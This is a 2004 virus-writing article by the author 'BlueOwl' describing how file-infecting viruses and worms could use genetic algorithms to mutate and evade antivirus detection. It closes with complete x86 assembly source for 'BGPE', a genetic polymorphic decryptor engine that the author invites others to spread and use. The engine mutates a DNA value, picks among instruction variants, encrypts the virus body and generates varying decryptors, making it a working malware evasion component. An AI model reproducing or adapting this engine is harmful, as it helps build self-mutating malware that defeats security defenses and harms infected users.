Implementing genetic algorithms in virusses    [by BlueOwl]

  


        Implementing genetic algorithms in virusses by BlueOwl
        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

        Introduction
        ************

        I have personally always been fascinated by evolution and am a strong
        believer that it is the truth about how organisms evolve. I have also
        spend many thoughts and codes and readings trying to figure out if it
        could also be implemented in  computer virusses,  of course something
        completely different.

        Normally  computer virusses either don't change them selves (static),
        they  encrypt  themselves  with   one or multiple decryptors or  they
        completely  change  their body  (hard to do). With the second and the
        third way virusses try to completely change their layout / code use /
        register use etc.This theory will try to prove that another way could
        be better.

        !Note! In this theory I mainly describe how a fileinfecting virus
        could use genetics. This can however be applied to any spreading
        program including worms, as long as you can be creative.


        Darwinian evolution - theory
        ****************************

        Ok, so in short. What is Darwinian evolution? Let assume we have one
        species, let us say dogs. And lets assume that they are put in the
        jungle without humans around. You probably know there are lots of
        different dogs. Small, thin, big with long/small tales large/small
        beaks etc. etc. So all these different ones are dumped into the jungle.

        Some would die because they could not find something to eat. Some
        because they were caught and eaten by lions. Some would fall and
        drown in rivers. Etc. But as you could imagine: From all those tens
        of thousands of dogs a few would still probably survive, because
        they were best adapted to the jungle. These remaining dogs would then
        mate and produce offspring. Some of these new dogs would be better
        adjusted to the environment, some worse. So some of this new generation
        would die but a lot of them would not, because they resembled their
        dog parents which *could* survive.

        With Darwinian evolution it is all about this. The strongest survive,
        and the offspring of these strongest will survive event better or
        worse. Ultimately creating the "perfect" species.


        So in short
        ***********

        Okay, so reading from the text above there are x core factors:

        - Each individual has a certain DNA which depends what it is, small
          thin, with long hair/short hair etc.
        - The environment kills individuals with certain characteristics,
          for example some dogs have long legs to run fast with so they
          can outrun lions, the ones with short legs are killed and eaten.
        - Dogs which *do* survive because of their positive characteristics
          will produce offspring which resembles them, thus they have
          a lot of the same characteristics but with a small number of
          changes. These changes will depend whether this individual
          will do better or worse than its parents.

        Binary organisms
        ****************

        This theory said, lets talk about modern computer virusses and
        evolution theory. What's the use of genetics in computer virusses?

        In the virus world, of course, there are no "natural" enemies. No
        lions, rivers, etc. etc. There is only one enemy: antivirusses.
        When an antivirus finds a virus, it will be removed. Killed. To
        detect virusses antivirusses have 2 ways: virus specific and
        virus unspecific (heuristic).

        The first method means a virus on the loose is 'caught'. Someone
        who is infected by it and sends it over to antivirus offices for
        analysing. It will get fully or partially analysed by antivirus
        personnel and a detection routine for it is generated. This is
        sent to all people owning the antivirus and thus they become
        'immune' to the virus.

        The second way for detecting virusses in general is for the
        antivirus to check for virus-like signs and suspicious things.
        What kind of things are suspicious and what things are not have
        been decided by the software authors. Some virusses will not get
        detected though, because they don't match the 'description'. The
        programmer cannot add an unlimited number of 'recognisers' because
        the more he adds the higher the chance will be a non-virus will
        fit the description.

        Binary and biologic: the connection
        ***********************************

        First let us talk about unspecific detection. With this detection
        virusses are detected on what they do. The antivirus can detect
        them on the changes they make to files they infect. But as I
        said before: Some virusses *do not* get detected. This is of
        course because each virus can have its own way of doing it.

        If we would compare this with a dog with long or short legs, we
        get a remarkably good comparison. If a dog has short legs he dies,
        and with long legs he survives. If a virus has one way of infecting
        it gets detected, if it uses another it does not.

        So what way is best for the virus to use? That's unknown. Just like
        a dog with short or long legs does not *know* if it will survive,
        a virus won't either. For the dog species in total it is not a
        problem. Some dogs will die but new dogs will take their places.
        For a virus species it *is* a problem. Simply because there are
        no different kinds of one virus. Even if the virus is polymorphic
        (self changing), it will still be a problem because a polymorphic
        virus survivor has no way of 'knowing' what combination worked.
        So it would be like a long-legged parent getting both long-legged
        and short-legged offspring.

        Here comes the idea of genetics and DNA for virusses to mind.
        What if the virus could 'remember' what kind of infection it did
        and pass it on with some slight modifications to its children.
        If it did that it could truly evolute like the dogs would.

        The same goes for specific detection. Let us say the antivirus
        researcher analyses the virus and finds a kind of infection. It
        is added to the virus database and all virusses using that kind
        will be detected and removed. Virusses using another one because
        of other DNA won't be removed and will take the place of the
        previous virus sample. That way virus evolution is complete: as
        long as not *ALL* virus samples have been added to the detection
        database, some will escape detection, live on and breed.

        Genetic algorithms
        ******************

        Genetic algorithms can be considered reasonably simple with
        a few things maybe harder to understand (and code). The structure
        of the, in my opinion, best genetic engine would be (explained
        later):

        For each file to infect:
        1) Save virus DNA
        2) Mutate virus DNA
        3) Infect file
        4) Restore virus DNA

        Firstly let us talk about the infection of the file. In this
        routine every possible genetic step (*) is made in the way of:

        > if (stepxgene==0){ do first way } else { do second way }

        To make the process more efficient it is the easiest to give all
        steps a fixed number of possibilities, Fe. all four possibilities.
        This will help in determining the way you are going to -store-
        the DNA. If you are thinking about multiple DNA steps per byte
        I would encourage you to use a number in the range of 2^... so
        you can use the maximum number of bits available.

        The save/mutate/restore may be a little bit harder to understand
        why it is done. The ultimate reason is the fact that this way the
        file will be infect according to DNA of the virus's OFFSPRING.
        That way the offspring 'knows' *exactly* what it consists of. If
        the virus would only give its copy a mutated DNA under infection
        evolution would stay behind a little. Fe. A virus has DNA A
        and infects a file in way A but gives its copy DNA B. Also a
        problem is the fact that all files infected by one virus will be
        infected in exactly the same way. And you don't see all the puppies
        of a dog look the same.

        Selecting appropriate genes
        ***************************

        What to make genetic and what not is another topic to think about
        and it is debatable. The real question is whether or not something
        is useful to be genetic. Fe. human hair colour is genetic, but
        fingerprints are even with one-egg twins different. Finger prints
        were in through the evolution of man clearly of no importance. You
        can add anything which you like to make genetic, but a problem
        comes up when you have something like:

        if(gene==0){ ...
                     if (anothergene==0){ ... } else { ... }
                     ...
                   } else {
                     ...
                     if (yetanothergene==0){ ... } else { ... }
                     ...
                   }

        Of course it is possible, but when you look at it more closely
        you will notice that the importance of a gene declines, f.e.:

        if (...){ if (...){ if (...){ ... } ..}..}

        If the first "if" gene will mutate all the inner genes won't
        get executed anymore, and a much bigger adaptation is made than
        when an inner gene is changed. So to be 'fair' you would have to
        make the chance of mutation smaller on more important genes. It
        is a problem which you can live with but I would recommend trying
        to avoid it and keeping it in this format:

        if (...) { ... }
        ...
        if (...) { ... }
        ...
        if (...) { ... }
        ...
        ...

        Furthermore, do not get carried away when creating genes. I mean
        do not create a self destruct gene. ;) And make sure all options
        are compatible! The best way to test for this is to put all genes
        first to zero, than to one etc. to the end number of different
        options. You can't test all combination individually anyway.

        Mutations
        *********

        Mutations are the essence of evolution. Without it, of course,
        everything would stay the same. So the engine should make a change
        sometimes. However this is another thing to think about: How often
        should something be changed? If too much is changed virusses could
        be completely different to soon and the effect of evolution lost.
        But if it changed too slow it could be not variable enough to
        escape detection and come up with new ways. Anyway, it is debatable.

        Furthermore, the number of possible mutations shouldn't also be
        static. So to stick to nature, every gene should independently have
        a certain chance of changing. My algorithm is (ASM):

        call     rand        ; eax = random
        xchg     eax, edx    ; (each bit has a chance of 1 in 2 to be 1)
        call     rand        ; eax = random
        and      edx, eax    ; chance 1 in 4
        call     rand
        and      edx, eax    ; chance 1 in 8
        call     rand
        and      edx, eax    ; chance 1 in 16
        call     rand
        and      edx, eax    ; chance 1 in 32

        So in this example, at the end, every bit in edx has a chance of
        one in thirty-two to be 1; while all others are zero. Thus because
        a dword consists out of 32 bits, the average should be one bit
        1 each time at the end of this proc. However 0, 2, 3, 4 ... 32 bits
        1 are also possibilities, but the chance 32 bits are 1 is a number of
        one in 48 digits. So we are save to assume too big mutations will
        almost never happen.

        So after getting this value we simply xor it with the dna (given
        the fact it only consists out of one dword). Giving a small number or
        no mutations.

        xor      [dna], edx

        Code example
        ************

        To give and example of how this *could* be implement I have coded this
        simple polymorphic engine. Actually it is not *that* simple and may
        be hard to understand, since I optimized most things about it. It has
        2 parts which contain genetics. A DNA variable (called DNA), and a
        register container. These are firstly saved at the start of the engine
        and then the originals are altered. Then it generates a decryptor
        according to these.

        The decryptor is then generated in the following way: All parts of the
        decryptor have four possible options (see the part under
        <call load_table>). So from the DNA each time 2 bits (can be 0,1,2,3)
        are read and used to pick the correct genetically specified option. If
        you check this out maybe you will learn some new techniques, but don't
        try to understand it too much :) (blame my coding style ;)).

        Final Word
        **********

        First of all, I hope you have enjoyed reading my article. As i am very
        interested in the subject myself, i liked to write something about this.
        I have already read other people thinking and writing about this subject,
        and i like it. I also hope this will enspire you to do new things with
        your codings, even completely different. This is not *necessarily* the
        best idea.

        BlueOwl november 2004


; ============================================


        ; BGPE  - BlueOwls Genetic Poly Engine (Simple version)

        ; Al though this is just a "simple" version, feel free to spread and
        ; use it in whatever you like, as long as you don't hold me responsible
        ; AND don't claim it is yours. :) What i was thinking about adding was
        ; placing all the code blocks in random order, maybe something for a
        ; next version ;).

        ; Good luck with it.
        ; BlueOwl

        ; BTW. Sorry for not commenting this much, but personally

                ; in:   eax = rnd
                ;       ecx = size of virus in bytes rounded to a dword ((virus_size+3)/4)*4
                ;       esi = start of virus
                ;       edi = start of outputbuffer
                ;
                ; out:  eax = size of generated


                ptr_low         equ 0      shl 3 + 6
                ptr_high        equ 1      shl 3 + 6
                ctr_low         equ 2      shl 3 + 6
                ctr_high        equ 3      shl 3 + 6
                tmp_low         equ 4      shl 3 + 6
                ptrtmp          equ 5      shl 3 + 6
                ptrptr          equ 6      shl 3 + 6
                ctrctr          equ 7      shl 3 + 6
                cjmp            equ 8      shl 3 + 6
                mlbl            equ 9      shl 3 + 6
                edword          equ 10     shl 3 + 6
                ebyte           equ 11     shl 3 + 6
                size_dword      equ 12     shl 3 + 6
                tmptmp          equ 13     shl 3 + 6
                ecd             equ 14     shl 3 + 6

                estart          equ ebp-4*1
                rna             equ ebp-4*2
                vsized          equ ebp-4*3
                lbler           equ ebp-4*4
                _edword         equ ebp+7*4
                _ebyte          equ ebp-4*5


BGPE:           pushad
                call    inner_delta
inner_delta:    pop     ebp
                push    dword [ebp+bgpe_dna-inner_delta]        ; save old dna
                push    dword [ebp+lregsstart-inner_delta]      ; save old registeruse
                push    dword [ebp+lregsstart+4-inner_delta]    ;  "        "
                push    ebp

                push    ecx
                lea     ecx, [ebp+lregsstart-inner_delta]
                lea     ebx, [ebp+bgpe_dna-inner_delta]
                mov     ebp, esp
                add     ebp, 4
                call    bgpe_rand
                xchg    edx, eax
                call    bgpe_rand
                and     edx, eax
                call    bgpe_rand
                and     edx, eax
                call    bgpe_rand
                and     edx, eax                                ; chance 1 in 16 for each bit

                xor     [ebx], edx

                push    7
                pop     edx
                xchg    ecx, edx
mutate_regs:    call    bgpe_rand
                test    eax, 0111b                              ; chance of 3 bits being 0 in 8
                jnz     no_mut
                mov     al, byte [edx]                          ; swap around register
                mov     byte [edx+1], al
no_mut:         inc     edx
                loop    mutate_regs
                pop     ecx

                mov     al, 0e8h
                stosb
                mov     eax, ecx
                stosd
                push    edi
                shr     ecx, 2
                db      068h
bgpe_dna        dd      0       ; 01010101010101010101010101010101b
                push    ecx
                push    eax
                rep     movsd
                call    bgpe_rand
                push    eax

                call    load_table

getptr:         gp1     db gp2-gp1,ptr_low,58h,ptr_low,50h              ; pop reg / push reg
                gp2     db gp3-gp2,08bh,ptr_high,04h,024h               ; mov reg, [esp]
                gp3     db gp4-gp3,0ffh,034h,024h,ptr_low,058h          ; push [esp] / pop reg
                gp4     db gp5-gp4,00bh,ptr_high,04h,024h,023h,ptr_high,04h,024h ; or reg, [esp] / and reg, [esp]
                gp5:

initcnt:        ic1     db ic2-ic1,ctr_low,0b8h,size_dword              ; mov reg, value
                ic2     db ic3-ic2,068h,size_dword,ctr_low,058h         ; push value / pop reg
                ic3     db ic4-ic3,083h,ctr_low,0e0h,000h,081h,ctr_low,0c0h,size_dword ; and reg, 0 / add reg, value
                ic4     db ic5-ic4,08dh,ctr_high,005h,size_dword        ; lea reg, [value]
                ic5:

getdword:       gd1     db gd2-gd1,mlbl,087h,ptrtmp,0                        ; xchg reg, [reg]
                gd2     db gd3-gd2,mlbl,0ffh,ptr_low,030h,tmp_low,058h       ; push [reg] / pop reg
                gd3     db gd4-gd3,mlbl,08bh,ptrtmp,0                        ; mov reg, [reg]
                gd4     db gd5-gd4,mlbl,00bh,ptrtmp,000h,023h,ptrtmp,000h    ; or reg, [reg] / and reg, [reg]
                gd5:

decryptdword:   cy1     db cy2-cy1,08dh,tmptmp,080h,edword,0c1h,tmp_low,0c0h,ebyte,ecd ; lea reg, [reg+value] / rol reg, value
                        push      ecx
                        movzx     ecx, byte [_ebyte]
                        ror       eax, cl
                        pop       ecx
                        sub       eax, [_edword]
                        ret
                cy2     db cy3-cy2,0c1h,tmp_low,0c8h,ebyte,0f7h,tmp_low,0d8h,ecd ; ror reg, value / neg reg
                        neg       eax
                        push      ecx
                        movzx     ecx, byte [_ebyte]
                        rol       eax, cl
                        pop       ecx
                        ret
                cy3     db cy4-cy3,0fh,tmp_low,0c8h,081h,tmp_low,0f0h,edword,ecd ; bswap reg / xor reg, value
                        xor       eax, [_edword]
                        bswap     eax
                        ret
                cy4     db cy5-cy4,081h,tmp_low,0e8h,edword,0f7h,tmp_low,0d0h,ecd ; sub reg, value / not reg
                        not       eax
                        add       eax, [_edword]
                        ret
                cy5:

putdword:       pd1     db pd2-pd1,087h,ptrtmp,0                        ; xchg [reg], reg
                pd2     db pd3-pd2,tmp_low,050h,08fh,ptr_low,000h       ; push reg / pop [reg]
                pd3     db pd4-pd3,089h,ptrtmp,0                        ; mov [reg], reg
                pd4     db pd5-pd4,021h,ptrtmp,000h,009h,ptrtmp,000h    ; and [reg], reg / or [reg], reg
                pd5:

addptr:         ap1     db ap2-ap1,08dh,ptrptr,040h,004h                ; lea reg, [reg+4]
                ap2     db ap3-ap2,083h,ptr_low,0c0h,004h               ; add reg, 4
                ap3     db ap4-ap3,083h,ptr_low,0e8h,0fch               ; sub reg, -4
                ap4     db ap5-ap4,ptr_low,040h,ptr_low,040h,ptr_low,040h,ptr_low,040h ; 4* inc reg
                ap5:

decctr:         dc1     db dc2-dc1,ctr_low,048h                         ; dec reg
                dc2     db dc3-dc2,083h,ctr_low,0e8h,001h               ; sub reg, 1
                dc3     db dc4-dc3,083h,ctr_low,0c0h,0ffh               ; add reg, -1
                dc4     db dc5-dc4,08dh,ctrctr,040h,0ffh                ; lea reg, [reg-1]
                dc5:

conjmp:         cj1     db cj2-cj1,009h,ctrctr,0c0h,074h,002h,0ebh,cjmp ; or reg, reg / jz $+4 / jmp label
                cj2     db cj3-cj2,ctr_low,040h,ctr_low,048h,075h,cjmp  ; inc reg / dec reg / jnz label
                cj3     db cj4-cj3,083h,ctr_low,0f8h,001h,073h,cjmp     ; cmp reg, 1 / jnb label
                cj4     db cj5-cj4,ctr_low,048h,078h,003h,ctr_low,040h,079h,cjmp ; dec reg / js $+3 / inc reg / jns label
                cj5:

doret:          rt1     db rt2-rt1,0c3h                                 ; ret
                rt2     db rt3-rt2,0c2h,000h,000h                       ; ret 0
                rt3     db rt4-rt3,058h,0ffh,0e0h                       ; pop eax / jmp eax
                rt4     db rt5-rt4,0ffh,034h,024h,0c2h,004h,00h         ; push [esp] / ret 4
                rt5:
                db 0

load_table:     pop     edx

                call    load_regs
lregsstart      db      00h,01h,02h,03h,05h,06h,07h
load_regs:      pop     ebx

do_decryptor:   cmp     byte [edx], 0
                jz      decryptor_done
                mov     esi, edx
                push    4
                pop     ecx
_reloadnext:    movzx   eax, byte [edx]
                add     edx, eax
                loop    _reloadnext
                mov     ecx, [rna]
                shr     dword [rna], 2                          ; move up rna
                and     ecx, 011b                               ; put ecx in range 0-3
                or      ecx, ecx
                jz      this_found
_loadthis:      movzx   eax, byte [esi]
                add     esi, eax
                loop    _loadthis
this_found:     movzx   ecx, byte [esi]
                dec     ecx
                inc     esi
process_table:  lodsb
                push    eax
                and     eax, 07h
                cmp     eax, 06
                pop     eax
                jz      special_command
                or      al, ah
                stosb
                sub     ah, ah
resume_process: loop    process_table
                jmp     do_decryptor
special_command:movzx   eax, al                                 ; process special command
do_command:     shr     eax, 3                                  ; (make label/add register/etc.)
                push    edx
                call    getsptrs
sptrs:          db      do_ptr_low-sptrs,do_ptr_high-sptrs,do_ctr_low-sptrs,do_ctr_high-sptrs
                db      do_tmp_low-sptrs,do_ptrtmp-sptrs,do_ptrptr-sptrs,do_ctrctr-sptrs
                db      do_docjmp-sptrs,do_mlbl-sptrs,do_edword-sptrs,do_ebyte-sptrs
                db      do_size_dword-sptrs,do_tmptmp-sptrs,do_ecd-sptrs
getsptrs:       pop     edx
                mov     al, byte [edx+eax]                      ; select the appropiate handler
                add     edx, eax
                sub     eax, eax
                call    edx
                pop     edx
                jmp     resume_process                          ; from here on different handlers
do_ecd:         push    edx edi
                xchg    esi, edx
                mov     ecx, [vsized]
                mov     esi, [estart]
                mov     edi, esi
_encrypt:       lodsd
                call    edx
                stosd
                loop    _encrypt
                push    1
                pop     ecx
                pop     edi edx
                ret
do_ptr_high:    mov     ah, [ebx+0]                             ; fix registers
                shl     ah, 3                                   ;    ...
                ret
do_ctr_high:    mov     ah, [ebx+1]
                shl     ah, 3
                ret
do_tmptmp:      mov     ah, [ebx+2]
                shl     ah, 3
do_tmp_low:     or      ah, [ebx+2]
                ret
do_ptrtmp:      mov     ah, [ebx+2]
                shl     ah, 3
                jmp     do_ptr_low
do_ptrptr:      mov     ah, [ebx+0]
                shl     ah, 3
do_ptr_low:     or      ah, [ebx+0]
                ret
do_ctrctr:      call    do_ctr_high
do_ctr_low:     or      ah, [ebx+1]
                ret
do_docjmp:      mov     eax, [lbler]                            ; calculate jump difference
                sub     eax, edi
                dec     eax
                stosb
                ret
do_mlbl:        mov     [lbler], edi
                ret
do_edword:      mov     eax, [_edword]
                jmp     store_zero
do_size_dword:  mov     eax, [vsized]
store_zero:     stosd
                sub     eax, eax
                ret
do_ebyte:       mov     al, [_ebyte]
                stosb
                ret
decryptor_done: mov     esp, ebp

                pop     ebp
                pop     dword [ebp+lregsstart+4-inner_delta]    ;  restore old stuff
                pop     dword [ebp+lregsstart-inner_delta]      ;
                pop     dword [ebp+bgpe_dna-inner_delta]        ;

                mov     [esp+4*7], edi
                popad
                sub     eax, edi
                ret
bgpe_rand:      mov     eax, [ebp+7*4]
                rol     eax, 7
                neg     ax
                add     eax, 0B78F23A5h                         ; just a number
                xor     [ebp+7*4], eax                          ; save for later
                ret

; ============================================

; Copyright BlueOwl 2004

; Have a nice time. EOF.